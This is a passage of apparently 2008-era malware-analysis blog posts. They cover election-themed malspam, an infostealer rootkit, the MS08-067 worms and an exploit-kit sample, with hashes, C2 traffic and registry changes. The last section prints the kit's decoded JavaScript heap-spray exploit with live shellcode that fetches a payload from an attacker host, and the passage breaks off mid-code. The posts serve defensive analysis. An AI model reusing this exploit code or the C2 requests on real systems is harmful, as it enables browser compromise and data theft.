amhvcketn.com is registered in RU and 66.232.111.112 is registered to NOC4Hosts Inc., US.

Several other malicious domains resolved to 66.232.111.112 at the time of analysis.

adk2lev.com
aqlgdjeni.com
avegeni.com
biedetn.com
bov2bllev.com
brzgeni.com
dfn2etn.com
fhp4etn.com
fqmgdjeni.com
frzvetn.com
giqgetn.com
gsagcketn.com
gsajetn.com
htb4cketn.com
htbgetn.com
ikfjcketn.com
iucvetn.com
jlgvcketn.com

for777daily.com is registered in RU and 58.20.129.158 is registered in China.

SmartDownload.exe Analysis:

SmartDownload.exe
ea93453c6392e17fc3f858dd1d08b7f3
466,752 bytes

Upon execution SmartDownload.exe creates the C:\Program Files\Gold VIP Club Casino directory and opens an installer window.

SmartDownload.exe connects to locator.realtimegaming.com (200.122.168.237) on TCP port 20000 to receive C2. The client sends the string “Gold VIP Club Casino” and receives the string “200.122.168.189”. A second connection returns the string hxxp://download.realtimegaming.com/cdn/goldvipclub. The client connects to download.realtimegaming.com which uses Akamai caching to download the installation files package_list.ini.crc and package_list.ini.zip.

GET /cdn/goldvipclub/package_list.ini.crc HTTP/1.1 Host: download.realtimegaming.com
GET /cdn/goldvipclub/package_list.ini.zip HTTP/1.1 Host: download.realtimegaming.com

The domain realtimegaming.com is registered to RealTime Gaming Holding Company, LLC (Costa Rica).

Reverse lookups for 200.122.168.237 rotate through several casino themed domains.

affiliateglobal.clubusacasino.com
mycasinoaccounts.com
affiliateglobal.clubusacasino.net
api.mycasinoaccounts.com
integrations.mycasinoaccounts.com
www.mycasinoaccounts.com
cs.realtimegaming.com
globalaffiliates.betmaxcasino.com

The following major files are created.

c:\Program Files\Gold VIP Club Casino\casino.dll
27cc0f7692c95d15a43b8e1221cb2e3f
745,472 bytes

c:\Program Files\Gold VIP Club Casino\casino.exe
7bcfafbe500a3b440e9b18431997022a
30,720 bytes

The following major registry keys are added to launch Gold VIP Club Casino at statup.

HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816} "(Default)"
Type: REG_SZ
Data: Gold Vip Club Casino
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\LocalServer32 "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\ProgID "(Default)"
Type: REG_SZ
Data: rtg.goldvipclub
HKEY_CLASSES_ROOT\rtg.goldvipclub "(Default)"
Type: REG_SZ
Data: URL: Realtime Gaming Protocol
HKEY_CLASSES_ROOT\rtg.goldvipclub "URL Protocol"
Type: REG_SZ
Data:
HKEY_CLASSES_ROOT\rtg.goldvipclub\CLSID "(Default)"
Type: REG_SZ
Data: {0CBAA404-8C7F-4070-8E42-8847E2394816}
HKEY_CLASSES_ROOT\rtg.goldvipclub\DefaultIcon "(Default)"
Type: REG_SZ
Data: casino.exe
HKEY_CLASSES_ROOT\rtg.goldvipclub\shell\open\command "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gold VIP Club Casino "DisplayName"
Type: REG_SZ
Data: Gold VIP Club Casino

The launching of Gold VIP Club Casino initiates a connection to 200.122.168.189 TCP port 22053. The casino game requires an account to be created and personal information provided. Not sure how much I would trust a game that was installed through obfuscated JavaScript, a series of redirects and deceptive advertising :)

Presidential Malspam

2008-11-09T15:35:00.013-05:00

On 05 November 2008, Barack Obama emails began circulating that contained hyperlinks to a fake news site that offered a video of Obama’s historic win. The site attempted to fool visitors into installing an Adobe Flash update adobe_flash.exe. The executable download installs an Infostealer trojan designed to steal personal information. Sophos and McAfee provided updates on the threat.

Sample email verbiage included the following:

"From: "President election results"
Subject: A new president, a new congress...
Barack Obama Elected 44th President of United States Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5! ...... "

On 7 November 2008, it was McCain’s turn to be center stage on the malspam front. The following is a sample email with a hyperlink to fake usa.gov news website.

From: USA news [mailto:videonews@usa.gov]
Sent: Friday, November 07, 2008 10:53 AM
Subject: McCain want to stop Obama

McCain Lawyer Impeach Obama!
McCain has reached an agreement with the Obama lawyers that makes Obama resignation effective November 11.
Barack Obama can lost President's Chair.
McCain video report 7 November:

Proceed to the election results news page>> <http://productsremote.configlogin.selfservice.YwgnjIkoZ.viewcontent.privatelogin.TW76dHSS4.serensy.com/services.htm?/rnalid/siteminderagent/OSL.htm?LOGIN=TlbX8Ywgnj&VERIFY=IkoZR9TW76dHSS4> 2008 USA Government Official Web Site.

Sample malspam email subjects include:

McCain Lawyers Want to Stop Obama
Barack Obama in Danger - McCain will fight for president post
McCain Lawmakers Impeach Obama
McCain said today: 'Impeach Obama'
Obama Impeachment Resources: McCain Look at the Impeachment Process ...
Obama faces impeachment
The Impeachment of new president Obama
IMPEACH Barrack Obama | USA government news
Scandal: Obama Resignation Letter
Video: Obama post-resignation speech
Barack Obama can lost President's Chair. The President's Resignation.
Barack Obama can lost presidents chair.The President's Resignation Speech - TIME
Barack Obama president resignation - 23/7 News
Barack Obama can lost President's Chair. Political Strike at WV Mine
Barack Obama can lost President's Chair. Political Strike Confronts the Global Economy
Barack Obama can lost President's Chair.POLITICAL STRIKE TIES
McCain strike against Obama political way
Obama vs McCain 'Political Strike' May Undermine Labor Group
McCain vs Obama - There is a higher potential for confrontation between opposing political forces
McCain want to stop Obama
Why MccAin Want to Stop Obama From president vacancy?
Scandal: Re-elections McCain will win
Scandal: Re-elections Obama: McCain Will Close With Attacks
WScandal: Re-elections hich John McCain will show up to debate?
Scandal: Re-elections Why John McCain will keep fighting
Scandal: Re-elections John McCain Will be a Dictator?
Scandal: Re-elections Why McCain Will Win
Scandal: Re-elections John McCain will defeat Barack Obama

Sample malspam email From field values include:

USA Government Center
USA news
CNN news
McCain News Center
Elections Centre
Election News

Sample malspam email From spoofed addresses include:

news@usa.gov
videonews@usa.gov
attention@usa.gov
news@usa.com
alert@usa.com
videonews@cnn.com
attention@cnn.com
news@cnn.com
alert@cnn.com

The malspam hyperlinks point to fast-fluxed hosted domains.

dieytemsn.com
poreibrsu.com
baraokl.com
serensy.com
oritrsunwart.com

The domains mapped to the following fast-flux IP addresses at the time of analysis.

IP Reverse Country
125.0.177.99 ntaich176099.aich.nt.ftth.ppp.infoweb.ne.jp JP
65.34.190.175 c-65-34-190-175.hsd1.fl.comcast.net US
75.31.240.8 adsl-75-31-240-8.dsl.chcgil.sbcglobal.net US
79.177.243.105 bzq-79-177-243-105.red.bezeqint.net IL
122.118.192.172 122-118-192-172.dynamic.hinet.net TW

The hyperlinks point to a fakeusa.gov website that advertises a McCain video and hyperlinks to get the Adobe Flash Media Player.

The site includes several methods of fooling victim’s into downloading AdobePlayer9.exe.

<meta http-equiv="REFRESH" content="10;url=../AdobePlayer9.exe">

<a href="AdobePlayer9.exe"><img border="0" src="160x41_Get_media_Player.jpg" width="160" height="41"></a>

<a href="AdobePlayer9.exe">
<img border="0" src="McCainvideo.jpg" width="582" height="402" onclick="alert1()" onMouseOver="window.status='http://media.usa.gov/downloads/McCain977855N';
return true" onMouseOut="window.status=''; return true" TARGET="_top"></a>

Malware Analysis

AdobePlayer9.exe
642a588272e9fe723fb2f1dd8fccede5
25,173 bytes

AdobePlayer9.exe creates C:\WINDOWS\9129837.exe

9129837.exe
642a588272e9fe723fb2f1dd8fccede5
25,173 bytes

9129837.exe creates C:\WINDOWS\new_drv.sys

new_drv.sys
a54de1d46ff7bdefbf9d9284c1916c5e
8,192 bytes

The following registry keys store malware identification data.

HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Type: REG_BINARY
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Type: REG_DWORD
Data: 50, FF, F4, 94
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Type: REG_DWORD
Data: B8, 72, F7, 4E
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 2

The following registry keys install new_drv.sys as a service.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"
Type: REG_BINARY
Data: [HEX VALUES]

The following hidden registry key launches 9129837.exe at startup

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ttool = C:\WINDOWS\9129837.exe

Both 9129837.exe and new_drv.sys install as a rootkit. Files, registry keys, and processes are hidden.

>SSDT State
NtEnumerateValueKey
Actual Address 0x81C1F58A
Hooked by: Unknown module filename

NtQueryDirectoryFile
Actual Address 0x81C1F6B6
Hooked by: Unknown module filename

NtQuerySystemInformation
Actual Address 0x81C1F85C
Hooked by: Unknown module filename

>Processes
!!!!!!!!!!!Hidden process: C:\WINDOWS\9129837.exe
Process Id: 596
EPROCESS Address: 0x81C9D9F8

>Files
Suspect File: C:\WINDOWS\9129837.exe Status: Hidden
Suspect File: C:\WINDOWS\new_drv.sys Status: Hidden

The malware hooks into any running process. The following example shows a hook into svchost.exe.

>Hooks
[1056]svchost.exe-->kernel32.dll-->CreateProcessA, Type: Inline - RelativeJump at address 0x77E61BBC hook handler located in [unknown_code_page]
[1056]svchost.exe-->kernel32.dll-->CreateProcessW, Type: Inline - RelativeJump at address 0x77E61B8E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestW, Type: Inline - RelativeJump at address 0x7622B059 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExW, Type: Inline - RelativeJump at address 0x76240C8A hook handler located in [unknown_code_page]

9129837.exe listens on TCP port 13899 and runs a s a hidden process.

Process C:\WINDOWS\9129837.exe (*** hidden ***)

Protocol Local Address Foreign Address State PID PathName
TCP 0.0.0.0 : 13899 0.0.0.0 : 0 LISTENING 596 C:\WINDOWS\9129837.exe
UDP 127.0.0.1 : 1037 * : * 596 C:\WINDOWS\9129837.exe
RAW --- --- --- 596 C:\WINDOWS\9129837.exe

9129837.exe connects to 91.203.93.57 (UA) to register itself, receive instructions and exfiltrate data. The malware performs the following connections:

POST /cgi-bin/pstore.cgi
GET /cgi-bin/cmd.cgi
GET /cgi-bin/options.cgi
POST /cgi-bin/cert.cgi

POST /cgi-bin/pstore.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dbe3fdbe3fdbe3f
User-Agent: IE
Host: 91.203.93.57
Content-Length: 224
Cache-Control: no-cache

----------------------------dbe3fdbe3fdbe3f
Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream
Forms:
----------------------------dbe3fdbe3fdbe3f--

GET /cgi-bin/cmd.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1
Host: 91.203.93.57

GET /cgi-bin/options.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1
Host: 91.203.93.57

POST /cgi-bin/cert.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dcd05dcd05dcd05
User-Agent: IE
Host: 91.203.93.57
Content-Length: 298
Cache-Control: no-cache

----------------------------dcd05dcd05dcd05
Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream

0S...0...*.H.. .......0.0;0.0...+............2........&..........N...+..\.......{....
----------------------------dcd05dcd05dcd05--

MS08-067 and W32.Wecorl

2008-11-09T15:14:00.005-05:00

On 2 November 2008, Symantec reported a “worm” called W32.Wercol that attempted to exploit the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067). The following provides analysis for the W32.Wercol malware variant 10wrjcenew.exe.

In a lab test, the malware 10wrjcenew.exe:

Created C:\DOCUME~1\%user profile%\LOCALS~1\Temp\Install.2008.dat
Deleted C:\WINDOWS\System32\Dllcache\Svchost.exe
Modified C:\WINDOWS\System32\Svchost.exe
Created C:\WINDOWS\system32\7DBF6DA4

The following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Google "[MAC ADDRESS]"
Type: REG_BINARY
Data: (data too large: 3584 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Licenses "[MAC ADDRESS]"
Type: REG_BINARY
Data: [HEXADECIMAL DATA]

The malware proceeded to download mimi.1268772 from ls.cc86.info (121.12.172.44, CN) and pp.gif from blog-imgs-27.fc2.com (208.71.107.52, US)

GET /mimi.1268772 HTTP/1.1
Host: ls.cc86.info

GET /u/f/o/ufo2000sgd/pp.gif HTTP/1.1
Host: blog-imgs-27.fc2.com

The malware attempted a MS08-067 buffer overflow exploit against 121.x.x.x UDP port 137

0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 4e 01 02 00 00 80 11 53 af c0 a8 00 0d 79 0c .N......S.....y.
0020 ac 2c 00 89 00 89 00 3a 5a 2d 80 13 00 00 00 01 .,.....:Z-......
0030 00 00 00 00 00 00 20 43 4b 41 41 41 41 41 41 41 ...... CKAAAAAAA
0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050 41 41 41 41 41 41 41 00 00 21 00 01 AAAAAAA..!..

The malware connects to ce.10wrj.com (218.95.101.68, CN) ClientReg.aspx and ClientTask.aspx to register the malware and receive C2 instructions. The sample connection shows a download request for ce.10wrj.com/nb1103.exe.

GET /ClientReg.aspx?mac=xx:xx:xx:xx:xx:xx&Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com

HTTP/1.1 200 OK

xxyysign xxyyMyIP=xx.xx.xx.xx

GET /ClientTask.aspx?mac= xx:xx:xx:xx:xx:xx &Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com

HTTP/1.1 200 OK

xxyysign
xxyyUserNamePassWord=CeUser:CePassWord
xxyyPort=0
xxyyUpdata=http://ce.10wrj.com/nb1103.exe*
xxyyRemoteHost=

The following files were observed during analysis:

10752 f01fd7ecfce8af65832a3a57d2789fa6 10wrjcenew.exe
12800 0f7d9c87b0ce1fa520473119752c6f79 3EDFB6D2
900 14c9db2b8177ca199f283e644fcda225 mimi.1268772
404992 0fdb364e8666140d4570d24f363d26d5 nb1103.exe
258048 944b1a83ee17db7fa779a2e7d970768c pp.gif

MS08-067 and Trojan.Gimmiv.A

2008-11-06T20:50:00.008-05:00

On 24 October 2008, Microsoft released an out-of-cycle patch that addressed a stack buffer overflow vulnerability in the Microsoft Windows Server service MS08-067, CVE-2008-4250. Per Microsoft, "This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit."

Public exploit code and malware began circulating as soon as the patch was released. Microsoft and Symantec provided analysis on malware known as Gimmiv.A. The malware harvests and exfiltrates system information and is able to scan and exploit the MS08-067 vulnerability. The following provides analysis findings for Gimmiv.A.

Site 59.106.145.58 (JP) was found to host nine Gimmiv.A binaries, n*1-9.

http[:]// 59.106.145.58/n*.exe

dc3fdfde66fffb6cfbec946a237787d8 397312 59.106.145.58/n1.exe
f173007fbd8e2190af3be7837acd70a4 397312 59.106.145.58/n2.exe
3ee354cc8b63b8849b28e6f376f2b263 397312 59.106.145.58/n3.exe
6c3e53864541bb13fa7853f7b580b807 397312 59.106.145.58/n4.exe
24cd978da62cff8370b83c26e134ff4c 397312 59.106.145.58/n5.exe
86d75ae361637a8f9114bb3a40f710d3 397312 59.106.145.58/n6.exe
ee70f981514803e1fb4e6b65f492a56d 397312 59.106.145.58/n7.exe
8d66f28d028a4838d09ce4b91d35b7cb 397312 59.106.145.58/n8.exe
477aac8d472a7bea8b906718a2f50c67 397312 59.106.145.58/n9.exe

The malware n2.exe was analyzed as an example.

n2.exe creates c:\WINDOWS\system32\wbem\sysmgr.dll

sysmgr.dll
1cdc67b1d55e9a2d30c0dba193375c11
336384 bytes

The following registry keys are created to install the malware as a service.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost
"sysmgr" = sysmgr
"DisplayName" = System Maintenance Service
"ErrorControl" = 0
"ImagePath" = %SystemRoot%\System32\svchost.exe -k sysmgr
"ObjectName" = LocalSystem
"Start" = 2
"Type" = 10, 01, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Enum
"0" = Root\LEGACY_SYSMGR\0000
"Count" = 1
"NextInstance" = 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Parameters
"ServiceDll" = C:\WINDOWS\System32\wbem\sysmgr.dll
"ServiceMain" = ServiceMainFunc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Security
"Security" = binary data

The malware searches the registry for the presence of installed antivirus programs and active processes for avp.exe and dwm.exe.

0002549C 1002549C 0 SOFTWARE\BitDefender
000254B4 100254B4 0 avp.exe
000254BC 100254BC 0 SOFTWARE\Jiangmin
000254D8 100254D8 0 SOFTWARE\KasperskyLab
000254F0 100254F0 0 SOFTWARE\Kingsoft
00025504 10025504 0 SOFTWARE\Symantec\PatchInst\NIS
00025524 10025524 0 SOFTWARE\Microsoft\OneCare Protection
0002554C 1002554C 0 SOFTWARE\rising
0002555C 1002555C 0 SOFTWARE\TrendMicro
00025574 10025574 0 dwm.exe

The malware sysmgr.dll sends ICMP Echo requests to 202.108.22.44 and 64.233.189.147. An Echo reply was returned from 64.233.189.147.

Source Destination Protocol Info
192.168.0.13 202.108.22.44 ICMP Echo (ping) request
192.168.0.13 64.233.189.147 ICMP Echo (ping) request
64.233.189.147 192.168.0.13 ICMP Echo (ping) reply

The ICMP packet contains a string of characters abcde12345fghij6789.

0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 30 00 81 00 00 80 01 98 fe c0 a8 00 0d ca 6c .0.............l
0020 16 2c 08 00 ba 5f 02 00 02 00 61 62 63 64 65 31 .,..._....abcde1
0030 32 33 34 35 66 67 68 69 6a 36 37 38 39 00 23 45 fghij6789.

The binary strings of sysmgr.dll reveal the ICMP string and a third IP 212.227.93.146

00039018 00439018 0 abcde12345fghij6789
00039030 00439030 0 212.227.93.146
00039070 00439070 0 64.233.189.147
00039090 00439090 0 202.108.22.44

202.108.22.44 (CN)
Reverse lookup xd-22-44-a8.bta.net.cn

64.233.189.147 (US)
Reverse lookup hk-in-f147.google.com

212.227.93.146 (DE)
Reverse lookup s167748465.websitehome.co.uk

The malware captures host information such as IP address and hostname and credentials from Outlook Express and Protected Storage.

00025E04 10025E04 0 Username
00025E10 10025E10 0 82BD0E67-9FEA-4748-8672-D5EFE5B779B0
00025E38 10025E38 0 Advapi32.dll
00025E48 10025E48 0 CredEnumerate
00025E58 10025E58 0 CredFree
00025E64 10025E64 0 Passport.Net\*
00025E74 10025E74 0 pstorec.dll
00025E80 10025E80 0 PStoreCreateInstance
00025E9C 10025E9C 0 89c39569
00025EA8 10025EA8 0 5e7e8100
00025EB4 10025EB4 0 e161255a
00025EC8 10025EC8 0 StringIndex
00025ED4 10025ED4 0 :String
00025EDC 10025EDC 0 :String
00025EE4 10025EE4 0 http:/
00025EEC 10025EEC 0 https:/
00025EF8 10025EF8 0 ===============Outlook Express===============
00025F28 10025F28 0 ===============Credential Info================
00025F58 10025F58 0 ============Protected Storage Info=============
00025F94 10025F94 0 Pass:
00025F9C 10025F9C 0 URL:
00025FA8 10025FA8 0 GetWebInfo
00025FB4 10025FB4 0 <%s %d> !!! Web ID/Pass Info ERR
00025FE7 10025FE7 0 ksysmgr

The malware exfiltrates the captured information to 59.106.145.58/test2.php?abc=[num]?def=[num]. The abc value represents the installed antivirus version and the def value represents the OS version. The exfiltrated data protected with encrypted with AES encryption.

00025638 10025638 0 ?abc=1
00025648 10025648 0 ?abc=3
00025658 10025658 0 ?abc=4
00025668 10025668 0 ?abc=5
00025678 10025678 0 ?abc=6
00025688 10025688 0 ?abc=7
00025698 10025698 0 ?abc=8
000256A8 100256A8 0 ?abc=9
000256B8 100256B8 0 ?abc=2
000256C8 100256C8 0 ?def=2
000256D8 100256D8 0 ?def=3
000256E8 100256E8 0 ?def=1
000256F8 100256F8 0 ?def=4
00025708 10025708 0 ?def=5

Gimmiv.A attempts to connect to the remote IP address 59.106.145.58 to download a CAB file to %System%\initproc02x.cab. From the CAB file, the trojan extracts the following files:

winbase.dll
basesvc.dll
syicon.dll

311296 82ba009746da8603c463f37e381a42a4 basesvc.dll
200704 60d692fd52098f145e448bd985fcff6d syicon.dll
49152 40cb861ad59c804f340fd8a2a28e226c winbase.dll

The additional dlls provide the functionality of scanning and exploiting the MS08-067 vulnerability.

Exploit Toolkit Expansion

2008-09-30T21:24:00.009-04:00

Automated exploit toolkits such as MPack, Neosploit, and various knockoffs continue to add exploits targeted against a wide variety of Microsoft Internet Explorer, Microsoft Office, Firefox, 3rd party plug-in and application (Flash, Adobe Acrobat Reader, WinZip, media players, etc.) vulnerabilities. The following exploit toolkit sample targeted 17 vulnerabilities.

Exploit Code Analysis:

A compromised website contained an iframe that redirected to http[:]//mixlong.cn/in/. The mixlog.cn site contained an iframe that redirected to http[:]//59.125.229.71/ex/7/index.php. The index.php page returned obfuscated JavaScript that decoded to reveal exploits targeted against the following vulnerabilities.

MDAC RDS.Dataspace ActiveX Control Vulnerability - CVE-2006-0003 - MS06-014

Microsoft Windows WebViewFolderIcon ActiveX integer overflow - CVE-2006-3730 - MS06-057

Microsoft Access Snapshot Viewer ActiveX Control Vulnerability - CVE-2008-2463 - MS08-041

Heap-based buffer overflow in DirectAnimation.PathControl COM object - CVE-2006-4446 - MS06-067

COM Object Instantiation Memory Corruption Vulnerability - CVE-2005-2127 - MS05-052

Microsoft Works ActiveX Control Remote Code Execution - CVE-2007-5348 - MS08-052

Ourgame GLWorld GLIEDown2.dll ActiveX Control Vulnerability

CA Products DSM ListCtrl ActiveX Control Code Execution Vulnerability - CVE-2008-1472

Adobe Reader and Acrobat Multiple Stack-based Buffer Overflow Vulnerabilities - CVE-2007-5659

America Online SuperBuddy ActiveX Control Code Execution Vulnerability - CVE-2006-5820

GOM Player GOM Manager ActiveX Control Buffer Overflow - CVE-2007-5779

Microsoft XML Core Services XMLHTTP ActiveX Control Vulnerability - CVE-2006-5745 - MS06-071

Apple QuickTime RTSP Content-Type header stack buffer overflow - CVE-2007-6166

RealNetworks RealPlayer ActiveX controls property heap memory corruption - CVE-2008-1309

Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow - CVE-2007-0018

Creative Software AutoUpdate Engine ActiveX stack buffer overflow - CVE-2008-0955

Sina DLoader Class ActiveX Control 'DonwloadAndInstall' Method Arbitrary File Download Vulnerability

Index.php Exploit Code:

var url="http[:]//59.125.229.71/ex/7/load.php?id=4366";
var m=new Array();
var mf=0;
function hex(num,width){
var digits="0123456789ABCDEF";
var hex=digits.substr(num&0xF,1);
while(num>0xF){
num=num>>>4;
hex=digits.substr(num&0xF,1)+hex;
}
var width=(width?width:0);
while(hex.length<width)hex="0"+hex;
return hex;
}
function addr(addr){
return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4));
}
function unes(str){
var tmp="";
for(var i=0;i<str.length;i+=4){
tmp+=addr((str.charCodeAt(i+3)<<24)+
(str.charCodeAt(i+2)<<16)+
(str.charCodeAt(i+1)<<8)+
str.charCodeAt(i));
}
return unescape(tmp);
}
function hav(){
m=m;
setTimeout("hav()",1000);
}
function gss(ss,sss){
while(ss.length*2<sss)ss+=ss;
ss=ss.substring(0,sss/2);
return ss;
}
function ms(){
var plc=unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u352F%u2E39%u3231%u2E35%u3232%u2E39%u3137%u652F%u2F78%u2F37%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3334%u3636%u7326%u6C70%u353D");
CollectGarbage();
if (mf)return(0);
mf=1;
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
for(i=0;i<hb;i++)m[i]=ss+plc;
hav();
return(1);
}
function cobj(obj){
var ret=null;
if(obj.substring(0,1)=="{"){
try{
var clsid=obj.substring(1,obj.length-1);
ret=document.createElement("object");
ret.setAttribute("classid","clsid:"+clsid);
return ret;
}catch(e){
return null;
}
}else{
try{
ret=new ActiveXObject(obj);
return ret;
}catch(e){
return null;
}
}
}
var padding = "AAAA";
var heapBase = 0x00150000;
var memo;
function init(maxAlloc){
while (4 + padding.length*2 + 2 < 65535)padding += padding;
memo = new Array();
flush();
}
function flush(){
delete memo["plunger"];
CollectGarbage();
memo["plunger"] = new Array();
var bytes = new Array(32, 64, 256, 32768);
for (var i = 0; i < 6; i++) {
for(var n = 0; n < 4; n++) {
var len = memo["plunger"].length;
eval("memo[\"plunger\"][len] = padding.substr(0, (" + bytes[n] + "-6)/2);");
}
}
}
function alloc(arg, tag){
var size;
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag] )memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = padding.substr(0, (arg-6)/2);
}
function alloc_str(arg, tag){
var size;
size = 4 + arg.length*2 + 2;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag])memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = arg.substr(0, arg.length);
